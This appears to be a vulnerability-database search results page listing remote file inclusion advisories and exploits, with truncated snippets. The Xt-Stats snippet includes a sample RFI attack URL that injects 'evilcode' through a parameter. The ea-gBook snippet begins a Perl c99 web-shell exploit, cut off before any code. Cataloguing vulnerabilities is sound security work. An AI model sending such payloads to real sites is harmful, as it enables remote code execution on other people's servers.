158 matches found
CVE-2021-24472
The OnAir2 WordPress theme before 3.9.9.2 and QT KenthaRadio WordPress plugin before 2.0.2 expose proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, which would allow for SSRF Server...
CVE-2024-4498 Path Traversal and RFI Vulnerability in parisneo/lollms-webui
A Path Traversal and Remote File Inclusion (RFI) vulnerability exists in the parisneo/lollms-webui application, affecting versions v9.7 to the latest. The vulnerability arises from insufficient input validation in the /applysettings function, allowing an attacker to manipulate the discussiondbname...
CVE-2024-20405
A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are...
Exploit for CVE-2023-3452
CVE-2023-3452-PoC - Wordpress Plugin Canto 3.0.5 - Remote...
WordPress Gwolle Guestbook Plugin < 1.5.4 RFI Vulnerability
The WordPress plugin SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description scriptoid"1.3.6.1.4.1.25623.1.0.112042";...
WordPress LoginWall Plugin Remote File Inclusion
A Remote File Inclusion vulnerability exists in WordPress LoginWall Plugin. Successful exploitation of this vulnerability would allow a non-authenticated attacker to include remote files and execute arbitrary code on the vulnerable system...
Mayhem — A New Malware Targets Linux and FreeBSD Web Servers
Security researchers from Russian Internet giant Yandex have discovered a new piece of malware that is being used to target Linux and FreeBSD web servers in order to make them a part of the wide botnet, even without the need of any root privileges. Researchers dubbed the malware as Mayhem, a nast...
FestOs <= 2.2.1 - Multiple RFI Exploit
No description provided by source. Exploit Title: FestOs = 2.2.1 Multiple RFI Exploit Date: 19-12-2009 Author: cr4wl3r Software Link: http://code.google.com/p/festos/downloads/list Version: N/A Tested on: GNU/LINUX Code : reportsplacement.php ?php $title = Jury Sheet Report;...
ezContents 2.0.3 showguestbook.php GLOBALS[admin_home] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote fi...
Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Include (RFI) Vulnerability
No description provided by source. Download:http://www.xt-scripts.com/index.php?dl=32 Finded by ThE dE@Th Greetz For :AsB-May Team & HaCk.eGy xtcounter.php: require $serverbasedir.'management/sources/counterclass.php'; http://www.site.com/path/xtcounter.php?serverbasedir=evilcode milw0rm.com...
ea-gBook 0.1 - Remote Command Execution with RFI (c99) Exploit
No description provided by source. !/usr/bin/perl ea-gBook 0.1 Remote Command Execution with RFI c99 Exploit Vendor: http://ea-style.de/ Download: http://ea-style.de/eddy/index.php?action=downgbookagb Author: bd0rk Contact: bd0rkathackermail.com site: http://www.soh-crew.it.tt thanks Joss for the...
Mp3 Online Id Tag Editor RFI Vulnerability
No description provided by source...
UBB Threads 6.0 - RFI Vulnerability
No description provided by source...
HowMany 2.6 - RFI Vulnerability
No description provided by source...
php classifieds 7.3 - Remote File Inclusion Vulnerability
No description provided by source. PHP Classifieds v7.3 RFI Vulnerability x ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability x DatE : 09 September 2010 x AutH0r : alsa7...
SaphpLesson 4.0 food RFI Vulnerability
No description provided by source...
Sonium Enterprise Adressbook <= 0.2 (folder) Include Vulnerability
No description provided by source. Sonium Enterprise Adressbook Version 0.2 folder RFI. Original advisory: http://www.bb-pcsecurity.de/Websecurity/342/org/SoniumEnterpriseAdressbookVersion0.2folderRFI.htm ...
Gallery 2.3 - RFI Vulnerability
No description provided by source...
Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability
No description provided by source. Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability | Software : comonlineflashquiz version 1.0.2 - paid component | Developer...